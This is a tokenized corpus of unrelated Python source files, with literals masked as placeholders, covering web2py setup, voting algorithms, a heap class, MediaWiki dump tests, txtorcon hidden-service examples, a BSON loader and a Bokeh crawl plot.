<s> if not request . env . web2py_runtime_gae : <EOL> db = DAL ( '<STR_LIT>' ) <EOL> else : <EOL> db = DAL ( '<STR_LIT>' ) <EOL> session . connect ( request , response , db = db ) <EOL> response . generic_patterns = [ '<STR_LIT:*>' ] if request . is_local else [ ] <EOL> from gluon . tools import Auth , Crud , Service , PluginManager , prettydate <EOL> auth = Auth ( db , hmac_key = Auth . get_or_create_key ( ) ) <EOL> crud , service , plugins = Crud ( db ) , Service ( ) , PluginManager ( ) <EOL> auth . define_tables ( ) <EOL> mail = auth . settings . mailer <EOL> mail . settings . server = '<STR_LIT>' or '<STR_LIT>' <EOL> mail . settings . sender = '<STR_LIT>' <EOL> mail . settings . login = '<STR_LIT>' <EOL> auth . settings . registration_requires_verification = False <EOL> auth . settings . registration_requires_approval = False <EOL> auth . settings . reset_password_requires_verification = True <EOL> from gluon . contrib . login_methods . rpx_account import use_janrain <EOL> use_janrain ( auth , filename = '<STR_LIT>' ) </s>
<s> import random , copy <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def makeup_votes ( nvotes = <NUM_LIT:100> , candidates = [ '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' , '<STR_LIT:D>' ] ) : <EOL> """<STR_LIT>""" <EOL> votes = [ ] <EOL> for k in range ( nvotes ) : <EOL> vote = copy . copy ( candidates ) <EOL> random . shuffle ( vote ) <EOL> votes . append ( vote ) <EOL> return votes <EOL> def is_valid ( vote ) : <EOL> """<STR_LIT>""" <EOL> return len ( vote ) == len ( set ( vote ) ) <EOL> def iro ( votes ) : <EOL> """<STR_LIT>""" <EOL> winners = [ ] <EOL> losers = set ( ) <EOL> allowed_options = reduce ( lambda a , b : a | b , [ set ( vote ) for vote in votes ] ) <EOL> n = len ( allowed_options ) <EOL> while len ( winners ) < n : <EOL> options = { } <EOL> for item in allowed_options : <EOL> if not item in losers : <EOL> options [ item ] = <NUM_LIT:0> <EOL> for vote in votes : <EOL> if is_valid ( vote ) : <EOL> for item in vote : <EOL> if not item in losers : <EOL> options [ item ] += <NUM_LIT:1> <EOL> break <EOL> options_list = [ ( v , k ) for ( k , v ) in options . items ( ) ] <EOL> options_list . sort ( ) <EOL> minv = options_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> for ( v , k ) in options_list : <EOL> if v == minv : <EOL> losers . add ( k ) <EOL> winners . append ( ( v , k ) ) <EOL> return winners <EOL> def borda ( votes , ignored = set ( ) , mode = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if not mode in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> winners = { } <EOL> n = len ( votes [ <NUM_LIT:0> ] ) <EOL> for vote in votes : <EOL> if is_valid ( vote ) : <EOL> if len ( vote ) != len ( set ( vote ) ) : <EOL> raise InvalidVote <EOL> for k , item in enumerate ( vote ) : <EOL> if not item in ignored : <EOL> if mode == '<STR_LIT>' : <EOL> delta = linear * ( n - k ) <EOL> elif mode == '<STR_LIT>' : <EOL> delta = <NUM_LIT:1.0> / ( k + <NUM_LIT:1> ) <EOL> elif mode == '<STR_LIT>' : <EOL> delta = n ** ( n - k - <NUM_LIT:1> ) <EOL> winners [ item ] = winners . get ( item , <NUM_LIT:0> ) + delta <EOL> winners = [ ( v , k ) for ( k , v ) in winners . items ( ) ] <EOL> winners . sort ( ) <EOL> return winners <EOL> def schulze ( votes ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> p = { } <EOL> candidates = list ( reduce ( lambda a , b : a & b , [ set ( vote ) for vote in votes ] ) ) <EOL> map_candid = dict ( ( k , i ) for ( i , k ) in enumerate ( candidates ) ) <EOL> n = len ( candidates ) <EOL> for i in range ( n ) : <EOL> for j in range ( n ) : <EOL> d [ i , j ] = p [ i , j ] = <NUM_LIT:0> <EOL> for vote in votes : <EOL> if is_valid ( vote ) : <EOL> for i in range ( <NUM_LIT:0> , n - <NUM_LIT:1> ) : <EOL> for j in range ( i + <NUM_LIT:1> , n ) : <EOL> key = ( map_candid [ vote [ i ] ] , map_candid [ vote [ j ] ] ) <EOL> d [ key ] += <NUM_LIT:1> <EOL> for i in range ( n ) : <EOL> for j in range ( n ) : <EOL> if i != j : <EOL> p [ i , j ] = d [ i , j ] if d [ i , j ] > d [ j , i ] else <NUM_LIT:0> <EOL> for i in range ( n ) : <EOL> for j in range ( n ) : <EOL> if i != j : <EOL> for k in range ( n ) : <EOL> if k != i and k != j : <EOL> p [ j , k ] = max ( p [ j , k ] , min ( p [ j , i ] , p [ i , k ] ) ) <EOL> winners = range ( n ) <EOL> winners . sort ( lambda i , j : cmp ( p [ i , j ] , p [ j , i ] ) ) <EOL> return [ ( i , candidates [ k ] ) for ( i , k ) in enumerate ( winners ) ] <EOL> def test ( nsamples = <NUM_LIT:10> ) : <EOL> diff_iro_borda = <NUM_LIT:0> <EOL> diff_iro_schulze = <NUM_LIT:0> <EOL> diff_borda_schulze = <NUM_LIT:0> <EOL> for k in range ( nsamples ) : <EOL> votes = makeup_votes ( <NUM_LIT:10> ) <EOL> a = iro ( votes ) <EOL> b = borda ( votes , mode = "<STR_LIT>" ) <EOL> c = schulze ( votes ) <EOL> if a [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] != b [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] : <EOL> diff_iro_borda += <NUM_LIT:1> <EOL> if a [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] != c [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] : <EOL> diff_iro_schulze += <NUM_LIT:1> <EOL> if b [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] != c [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] : <EOL> diff_borda_schulze += <NUM_LIT:1> <EOL> print diff_iro_borda , diff_iro_schulze , diff_borda_schulze <EOL> def test_schulze ( ) : <EOL> votes = [ ] <EOL> for i in range ( <NUM_LIT:5> ) : votes . append ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:5> ) : votes . append ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:8> ) : votes . append ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:3> ) : votes . append ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:7> ) : votes . append ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:2> ) : votes . append ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:7> ) : votes . append ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:8> ) : votes . append ( '<STR_LIT>' ) <EOL> assert schulze ( votes ) == [ ( <NUM_LIT:0> , '<STR_LIT:D>' ) , ( <NUM_LIT:1> , '<STR_LIT:B>' ) , ( <NUM_LIT:2> , '<STR_LIT:C>' ) , ( <NUM_LIT:3> , '<STR_LIT:A>' ) , ( <NUM_LIT:4> , '<STR_LIT:E>' ) ] <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test ( ) <EOL> test_schulze ( ) <EOL> votes = makeup_votes ( <NUM_LIT:10> ) <EOL> print borda ( votes , mode = "<STR_LIT>" ) <EOL> print iro ( votes ) <EOL> print schulze ( votes ) </s>
<s> """<STR_LIT>""" <EOL> class BlockedTest ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class SkipTest ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class DeprecatedTest ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> class Book : <EOL> title = "<STR_LIT>" <EOL> authors = [ ] <EOL> pages = <NUM_LIT:0> <EOL> def print_book ( self ) : <EOL> print self . title <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT:=>" * <NUM_LIT:15> <EOL> for author in self . authors : <EOL> print author <EOL> print "<STR_LIT>" , self . pages </s>
<s> from collections import namedtuple <EOL> from ... util import ordered <EOL> from . import defaults <EOL> Revert = namedtuple ( "<STR_LIT>" , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> """<STR_LIT>""" <EOL> class Detector ( ordered . HistoricalMap ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , radius = defaults . RADIUS ) : <EOL> """<STR_LIT>""" <EOL> if radius < <NUM_LIT:1> : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> super ( ) . __init__ ( maxlen = radius + <NUM_LIT:1> ) <EOL> def process ( self , checksum , revision = None ) : <EOL> """<STR_LIT>""" <EOL> revert = None <EOL> if checksum in self : <EOL> reverteds = list ( self . up_to ( checksum ) ) <EOL> if len ( reverteds ) > <NUM_LIT:0> : <EOL> revert = Revert ( revision , reverteds , self [ checksum ] ) <EOL> self . insert ( checksum , revision ) <EOL> return revert </s>
<s> import heapq <EOL> class Heap ( list ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> list . __init__ ( self , * args , ** kwargs ) <EOL> heapq . heapify ( self ) <EOL> def pop ( self ) : <EOL> return heapq . heappop ( self ) <EOL> def push ( self , item ) : <EOL> heapq . heappush ( self , item ) <EOL> def peek ( self ) : <EOL> return self [ <NUM_LIT:0> ] <EOL> def pushpop ( self , item ) : <EOL> return heapq . heappushpop ( self , item ) <EOL> def poppush ( self , itemp ) : <EOL> return heapq . replace ( self , item ) </s>
<s> import io <EOL> from nose . tools import eq_ , assert_is_instance <EOL> from ... . types import Timestamp <EOL> from . . iterator import Iterator <EOL> from . . comment import Comment <EOL> from . . text import Text <EOL> from . . revision import Revision <EOL> from . . page import Page <EOL> SAMPLE_XML = """<STR_LIT>""" <EOL> def test_complete ( ) : <EOL> f = io . StringIO ( SAMPLE_XML ) <EOL> dump = Iterator . from_file ( f ) <EOL> eq_ ( [ <NUM_LIT:0> , <NUM_LIT:1> ] , list ( ns . id for ns in dump . namespaces ) ) <EOL> page = next ( dump ) <EOL> eq_ ( page . title , "<STR_LIT>" ) <EOL> eq_ ( page . namespace , <NUM_LIT:0> ) <EOL> eq_ ( page . id , <NUM_LIT:1> ) <EOL> eq_ ( page . redirect , None ) <EOL> eq_ ( page . restrictions , [ ] ) <EOL> revision = next ( page ) <EOL> eq_ ( revision . id , <NUM_LIT:1> ) <EOL> eq_ ( revision . timestamp , Timestamp ( "<STR_LIT>" ) ) <EOL> eq_ ( revision . contributor . id , <NUM_LIT> ) <EOL> eq_ ( revision . contributor . user_text , "<STR_LIT>" ) <EOL> assert_is_instance ( revision . text , Text ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . text . bytes , <NUM_LIT> ) <EOL> eq_ ( revision . text . id , <NUM_LIT> ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . sha1 , "<STR_LIT>" ) <EOL> eq_ ( revision . comment , None ) <EOL> eq_ ( revision . model , "<STR_LIT>" ) <EOL> eq_ ( revision . format , "<STR_LIT>" ) <EOL> eq_ ( revision . beginningofpage , True ) <EOL> revision = next ( page ) <EOL> eq_ ( revision . id , <NUM_LIT:2> ) <EOL> eq_ ( revision . timestamp , Timestamp ( "<STR_LIT>" ) ) <EOL> eq_ ( revision . contributor . id , None ) <EOL> eq_ ( revision . contributor . user_text , "<STR_LIT>" ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . text . bytes , <NUM_LIT> ) <EOL> eq_ ( revision . text . id , <NUM_LIT> ) <EOL> eq_ ( revision . sha1 , "<STR_LIT>" ) <EOL> assert_is_instance ( revision . comment , Comment ) <EOL> eq_ ( revision . comment , "<STR_LIT>" ) <EOL> eq_ ( revision . model , "<STR_LIT>" ) <EOL> eq_ ( revision . format , "<STR_LIT>" ) <EOL> eq_ ( revision . beginningofpage , False ) <EOL> page = next ( dump ) <EOL> assert_is_instance ( page , Page ) <EOL> eq_ ( page . title , "<STR_LIT>" ) <EOL> eq_ ( page . namespace , <NUM_LIT:1> ) <EOL> eq_ ( page . id , <NUM_LIT:2> ) <EOL> eq_ ( page . redirect . title , "<STR_LIT>" ) <EOL> eq_ ( page . restrictions , [ "<STR_LIT>" ] ) <EOL> revision = next ( page ) <EOL> assert_is_instance ( revision , Revision ) <EOL> eq_ ( revision . id , <NUM_LIT:3> ) <EOL> eq_ ( revision . timestamp , Timestamp ( "<STR_LIT>" ) ) <EOL> eq_ ( revision . contributor . id , None ) <EOL> eq_ ( revision . contributor . user_text , "<STR_LIT>" ) <EOL> assert_is_instance ( revision . text , Text ) <EOL> eq_ ( revision . text . bytes , <NUM_LIT> ) <EOL> eq_ ( revision . text . id , <NUM_LIT> ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . sha1 , "<STR_LIT>" ) <EOL> eq_ ( revision . comment , None ) <EOL> eq_ ( revision . model , "<STR_LIT>" ) <EOL> eq_ ( revision . format , "<STR_LIT>" ) <EOL> assert_is_instance ( str ( page ) , str ) <EOL> revision = next ( page ) <EOL> assert_is_instance ( revision , Revision ) <EOL> eq_ ( revision . id , <NUM_LIT:4> ) <EOL> eq_ ( revision . timestamp , Timestamp ( "<STR_LIT>" ) ) <EOL> eq_ ( revision . contributor , None ) <EOL> assert_is_instance ( revision . text , Text ) <EOL> eq_ ( revision . text . bytes , <NUM_LIT> ) <EOL> eq_ ( revision . text . id , <NUM_LIT> ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . sha1 , "<STR_LIT>" ) <EOL> eq_ ( revision . comment , None ) <EOL> eq_ ( revision . model , "<STR_LIT>" ) <EOL> eq_ ( revision . format , "<STR_LIT>" ) <EOL> assert_is_instance ( str ( revision ) , str ) <EOL> def test_skipping ( ) : <EOL> f = io . StringIO ( SAMPLE_XML ) <EOL> dump = Iterator . from_file ( f ) <EOL> page = next ( dump ) <EOL> eq_ ( page . title , "<STR_LIT>" ) <EOL> eq_ ( page . namespace , <NUM_LIT:0> ) <EOL> eq_ ( page . id , <NUM_LIT:1> ) <EOL> page = next ( dump ) <EOL> eq_ ( page . title , "<STR_LIT>" ) <EOL> eq_ ( page . namespace , <NUM_LIT:1> ) <EOL> eq_ ( page . id , <NUM_LIT:2> ) <EOL> revision = next ( page ) <EOL> eq_ ( revision . id , <NUM_LIT:3> ) <EOL> eq_ ( revision . timestamp , Timestamp ( "<STR_LIT>" ) ) <EOL> eq_ ( revision . contributor . id , None ) <EOL> eq_ ( revision . contributor . user_text , "<STR_LIT>" ) <EOL> assert_is_instance ( revision . text , Text ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . sha1 , "<STR_LIT>" ) <EOL> eq_ ( revision . comment , None ) <EOL> eq_ ( revision . model , "<STR_LIT>" ) <EOL> eq_ ( revision . format , "<STR_LIT>" ) <EOL> def test_serialization ( ) : <EOL> f = io . StringIO ( SAMPLE_XML ) <EOL> dump = Iterator . from_file ( f ) <EOL> eq_ ( dump , Iterator . deserialize ( dump . serialize ( ) ) ) <EOL> def test_from_page_xml ( ) : <EOL> page_xml = """<STR_LIT>""" <EOL> dump = Iterator . from_page_xml ( io . StringIO ( page_xml ) ) <EOL> eq_ ( dump . namespaces , [ ] ) <EOL> page = next ( dump ) <EOL> eq_ ( page . title , "<STR_LIT>" ) <EOL> eq_ ( page . namespace , <NUM_LIT:0> ) <EOL> eq_ ( page . id , <NUM_LIT:1> ) <EOL> revision = next ( page ) <EOL> eq_ ( revision . id , <NUM_LIT:1> ) <EOL> eq_ ( revision . timestamp , Timestamp ( "<STR_LIT>" ) ) <EOL> eq_ ( revision . contributor . id , <NUM_LIT> ) <EOL> eq_ ( revision . contributor . user_text , "<STR_LIT>" ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . sha1 , "<STR_LIT>" ) <EOL> eq_ ( revision . comment , None ) <EOL> eq_ ( revision . model , "<STR_LIT>" ) <EOL> eq_ ( revision . format , "<STR_LIT>" ) <EOL> revision = next ( page ) <EOL> eq_ ( revision . id , <NUM_LIT:2> ) <EOL> eq_ ( revision . timestamp , Timestamp ( "<STR_LIT>" ) ) <EOL> eq_ ( revision . contributor . id , None ) <EOL> eq_ ( revision . contributor . user_text , "<STR_LIT>" ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . sha1 , "<STR_LIT>" ) <EOL> eq_ ( revision . comment , "<STR_LIT>" ) <EOL> eq_ ( revision . model , "<STR_LIT>" ) <EOL> eq_ ( revision . format , "<STR_LIT>" ) </s>
<s> import shutil <EOL> from twisted . internet import reactor <EOL> from twisted . web import server , resource <EOL> from twisted . internet . endpoints import serverFromString <EOL> import txtorcon <EOL> class Simple ( resource . Resource ) : <EOL> isLeaf = True <EOL> def render_GET ( self , request ) : <EOL> return "<STR_LIT>" <EOL> site = server . Site ( Simple ( ) ) <EOL> def setup_failed ( arg ) : <EOL> print "<STR_LIT>" , arg <EOL> def setup_complete ( port ) : <EOL> local = txtorcon . IHiddenService ( port ) . local_address . getHost ( ) <EOL> print "<STR_LIT>" , port . getHost ( ) <EOL> print "<STR_LIT>" , local <EOL> def progress ( percent , tag , message ) : <EOL> bar = int ( percent / <NUM_LIT:10> ) <EOL> print '<STR_LIT>' % ( '<STR_LIT:#>' * bar , '<STR_LIT:.>' * ( <NUM_LIT:10> - bar ) , message ) <EOL> hs_endpoint1 = serverFromString ( reactor , "<STR_LIT>" ) <EOL> hs_endpoint2 = serverFromString ( reactor , "<STR_LIT>" ) <EOL> txtorcon . IProgressProvider ( hs_endpoint1 ) . add_progress_listener ( progress ) <EOL> txtorcon . IProgressProvider ( hs_endpoint2 ) . add_progress_listener ( progress ) <EOL> d1 = hs_endpoint1 . listen ( site ) <EOL> d2 = hs_endpoint2 . listen ( site ) <EOL> d1 . addCallback ( setup_complete ) . addErrback ( setup_failed ) <EOL> d2 . addCallback ( setup_complete ) . addErrback ( setup_failed ) <EOL> reactor . run ( ) </s>
<s> from __future__ import absolute_import <EOL> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> from __future__ import with_statement <EOL> from txtorcon . _metadata import __version__ , __author__ , __contact__ <EOL> from txtorcon . _metadata import __license__ , __copyright__ , __url__ <EOL> from txtorcon . router import Router <EOL> from txtorcon . circuit import Circuit <EOL> from txtorcon . circuit import build_timeout_circuit <EOL> from txtorcon . circuit import CircuitBuildTimedOutError <EOL> from txtorcon . stream import Stream <EOL> from txtorcon . torcontrolprotocol import connect <EOL> from txtorcon . torcontrolprotocol import TorControlProtocol <EOL> from txtorcon . torcontrolprotocol import TorProtocolError <EOL> from txtorcon . torcontrolprotocol import TorProtocolFactory <EOL> from txtorcon . torcontrolprotocol import DEFAULT_VALUE <EOL> from txtorcon . torstate import TorState <EOL> from txtorcon . torstate import build_tor_connection <EOL> from txtorcon . torstate import build_local_tor_connection <EOL> from txtorcon . torconfig import TorConfig <EOL> from txtorcon . torconfig import HiddenService <EOL> from txtorcon . torconfig import EphemeralHiddenService <EOL> from txtorcon . torconfig import TorProcessProtocol <EOL> from txtorcon . torconfig import launch_tor <EOL> from txtorcon . torconfig import TorNotFound <EOL> from txtorcon . torinfo import TorInfo <EOL> from txtorcon . addrmap import AddrMap <EOL> from txtorcon . endpoints import TorOnionAddress <EOL> from txtorcon . endpoints import TorOnionListeningPort <EOL> from txtorcon . endpoints import TCPHiddenServiceEndpoint <EOL> from txtorcon . endpoints import TCPHiddenServiceEndpointParser <EOL> from txtorcon . endpoints import TorClientEndpoint <EOL> from txtorcon . endpoints import TorClientEndpointStringParser <EOL> from txtorcon . endpoints import IHiddenService , IProgressProvider <EOL> from txtorcon . endpoints import get_global_tor <EOL> from . import util <EOL> from . import interface <EOL> from txtorcon . interface import ( <EOL> ITorControlProtocol , <EOL> IStreamListener , IStreamAttacher , StreamListenerMixin , <EOL> ICircuitContainer , ICircuitListener , CircuitListenerMixin , <EOL> IRouterContainer , IAddrListener , <EOL> ) <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from waltz import web , db <EOL> from datetime import datetime <EOL> from lazydb import Db <EOL> class Analytics : <EOL> def GET ( self ) : <EOL> web . header ( '<STR_LIT:Content-Type>' , '<STR_LIT:application/json>' ) <EOL> return db ( ) . get ( '<STR_LIT>' ) <EOL> def rss ( items_func , template = None , ** kwargs ) : <EOL> rss = RSS ( template = template , ** kwargs ) <EOL> class RSSfeed : <EOL> def GET ( self ) : <EOL> web . header ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) <EOL> return rss . feed ( items_func ( ) ) <EOL> return RSSfeed <EOL> class RSS : <EOL> _template = """<STR_LIT>""" <EOL> def __init__ ( self , template = None , ** kwargs ) : <EOL> template = template or self . _template <EOL> self . kwargs = kwargs <EOL> if template == self . _template : <EOL> for ( k , v ) in [ ( '<STR_LIT:title>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:description>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:date>' , datetime . now ( ) . ctime ( ) ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] : <EOL> kwargs . setdefault ( k , v ) <EOL> self . template = web . template . Template ( template ) <EOL> def feed ( self , items ) : <EOL> """<STR_LIT>""" <EOL> kwargs = { '<STR_LIT>' : items } <EOL> kwargs . update ( self . kwargs ) <EOL> return self . template ( ** kwargs ) </s>
<s> import bson <EOL> import os <EOL> import simplejson as json <EOL> import struct <EOL> import memcacheConstants <EOL> import pump <EOL> BSON_SCHEME = "<STR_LIT>" <EOL> class BSONSource ( pump . Source ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , opts , spec , source_bucket , source_node , <EOL> source_map , sink_map , ctl , cur ) : <EOL> super ( BSONSource , self ) . __init__ ( opts , spec , source_bucket , source_node , <EOL> source_map , sink_map , ctl , cur ) <EOL> self . done = False <EOL> self . f = None <EOL> @ staticmethod <EOL> def can_handle ( opts , spec ) : <EOL> return spec . startswith ( BSON_SCHEME ) and os . path . isfile ( spec . replace ( BSON_SCHEME , "<STR_LIT>" ) ) <EOL> @ staticmethod <EOL> def check ( opts , spec ) : <EOL> return <NUM_LIT:0> , { '<STR_LIT>' : spec , <EOL> '<STR_LIT>' : [ { '<STR_LIT:name>' : os . path . basename ( spec ) , <EOL> '<STR_LIT>' : [ { '<STR_LIT>' : '<STR_LIT>' } ] } ] } <EOL> @ staticmethod <EOL> def provide_design ( opts , source_spec , source_bucket , source_map ) : <EOL> return <NUM_LIT:0> , None <EOL> def provide_batch ( self ) : <EOL> if self . done : <EOL> return <NUM_LIT:0> , None <EOL> if not self . f : <EOL> try : <EOL> self . f = open ( self . spec . replace ( BSON_SCHEME , "<STR_LIT>" ) ) <EOL> except IOError , e : <EOL> return "<STR_LIT>" % ( self . spec , e ) , None <EOL> batch = pump . Batch ( self ) <EOL> batch_max_size = self . opts . extra [ '<STR_LIT>' ] <EOL> batch_max_bytes = self . opts . extra [ '<STR_LIT>' ] <EOL> cmd = memcacheConstants . CMD_TAP_MUTATION <EOL> vbucket_id = <NUM_LIT> <EOL> cas , exp , flg = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> <EOL> while ( self . f and <EOL> batch . size ( ) < batch_max_size and <EOL> batch . bytes < batch_max_bytes ) : <EOL> doc_size_buf = self . f . read ( <NUM_LIT:4> ) <EOL> if not doc_size_buf : <EOL> self . done = True <EOL> self . f . close ( ) <EOL> self . f = None <EOL> break <EOL> doc_size , = struct . unpack ( "<STR_LIT>" , doc_size_buf ) <EOL> doc_buf = self . f . read ( doc_size - <NUM_LIT:4> ) <EOL> if not doc_buf : <EOL> self . done = True <EOL> self . f . close ( ) <EOL> self . f = None <EOL> break <EOL> doc = bson . _elements_to_dict ( doc_buf , dict , True ) <EOL> key = doc [ '<STR_LIT>' ] <EOL> doc_json = json . dumps ( doc ) <EOL> msg = ( cmd , vbucket_id , key , flg , exp , cas , '<STR_LIT>' , doc_json ) <EOL> batch . append ( msg , len ( doc ) ) <EOL> if batch . size ( ) <= <NUM_LIT:0> : <EOL> return <NUM_LIT:0> , None <EOL> return <NUM_LIT:0> , batch </s>
<s> import os <EOL> from . flann_imagecontentsearch import FlannImageContentSearch <EOL> def load ( info ) : <EOL> index = '<STR_LIT>' <EOL> if index not in os . environ or os . environ [ index ] == '<STR_LIT>' : <EOL> raise Exception ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % index ) <EOL> else : <EOL> os . environ [ index ] = os . environ [ index ] . rstrip ( '<STR_LIT:/>' ) <EOL> info [ '<STR_LIT>' ] . flann_imagecontentsearch = FlannImageContentSearch ( ) </s>
<s> from __future__ import division <EOL> from __future__ import print_function <EOL> from datetime import datetime <EOL> import json <EOL> from Queue import Empty <EOL> import numpy as np <EOL> from bokeh . plotting import figure , output_server <EOL> from kombu import Exchange , Connection , Queue <EOL> from bokeh . models . glyphs import Segment <EOL> from bokeh . models . markers import Circle <EOL> from bokeh . models import Range1d , ColumnDataSource <EOL> from bokeh . models . grids import Grid <EOL> from bokeh . embed import autoload_server <EOL> from bokeh . session import Session <EOL> from bokeh . document import Document <EOL> DEFAULT_NUM_URLS = <NUM_LIT> <EOL> URL_CHAR_WIDTH = <NUM_LIT:50> <EOL> EXCHANGE_NAME = "<STR_LIT>" <EOL> PLOT_CIRCLES = False <EOL> def init_plot ( crawl_name ) : <EOL> session = Session ( ) <EOL> document = Document ( ) <EOL> session . use_doc ( crawl_name ) <EOL> session . load_document ( document ) <EOL> if document . context . children : <EOL> plot = document . context . children [ <NUM_LIT:0> ] <EOL> else : <EOL> output_server ( crawl_name ) <EOL> current = np . datetime64 ( datetime . now ( ) ) <EOL> xdr = Range1d ( current , current + <NUM_LIT:1> ) <EOL> ydr = [ "<STR_LIT>" ] <EOL> plot = figure ( title = "<STR_LIT>" , tools = "<STR_LIT>" , <EOL> x_axis_type = "<STR_LIT>" , y_axis_location = "<STR_LIT:right>" , x_range = xdr , y_range = ydr , <EOL> width = <NUM_LIT> , height = <NUM_LIT> ) <EOL> plot . toolbar_location = None <EOL> plot . xgrid . grid_line_color = None <EOL> plot . ygrid . grid_line_color = None <EOL> plot . xaxis . minor_tick_line_color = None <EOL> plot . xaxis . major_tick_line_color = None <EOL> plot . xaxis . major_label_text_font_size = '<STR_LIT>' <EOL> plot . yaxis . minor_tick_line_color = None <EOL> plot . yaxis . major_tick_line_color = None <EOL> plot . yaxis . major_label_text_font_size = '<STR_LIT>' <EOL> document . add ( plot ) <EOL> session . store_document ( document ) <EOL> script = autoload_server ( plot , session ) <EOL> script = script . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> return script <EOL> class NutchUrlTrails : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def strip_url ( url ) : <EOL> """<STR_LIT>""" <EOL> stripped_url = url . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT::>' , '<STR_LIT:_>' ) . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> if len ( stripped_url ) <= URL_CHAR_WIDTH : <EOL> return stripped_url <EOL> else : <EOL> return stripped_url [ : int ( URL_CHAR_WIDTH / <NUM_LIT:2> ) ] + '<STR_LIT>' + stripped_url [ - int ( URL_CHAR_WIDTH / <NUM_LIT:2> ) - <NUM_LIT:3> : ] <EOL> @ staticmethod <EOL> def jtime_to_datetime ( t ) : <EOL> """<STR_LIT>""" <EOL> return np . datetime64 ( datetime . fromtimestamp ( t / <NUM_LIT> ) ) <EOL> def __init__ ( self , crawl_name , num_urls = DEFAULT_NUM_URLS ) : <EOL> """<STR_LIT>""" <EOL> self . crawl_name = crawl_name <EOL> self . num_urls = num_urls <EOL> self . open_urls = { } <EOL> self . closed_urls = { } <EOL> self . old_segments = None <EOL> self . old_circles = None <EOL> self . session = Session ( ) <EOL> self . session . use_doc ( self . crawl_name ) <EOL> self . document = Document ( ) <EOL> con = Connection ( ) <EOL> exchange = Exchange ( EXCHANGE_NAME , '<STR_LIT>' , durable = False ) <EOL> queue = Queue ( crawl_name , exchange = exchange , routing_key = crawl_name ) <EOL> self . queue = con . SimpleQueue ( name = queue ) <EOL> def handle_messages ( self ) : <EOL> 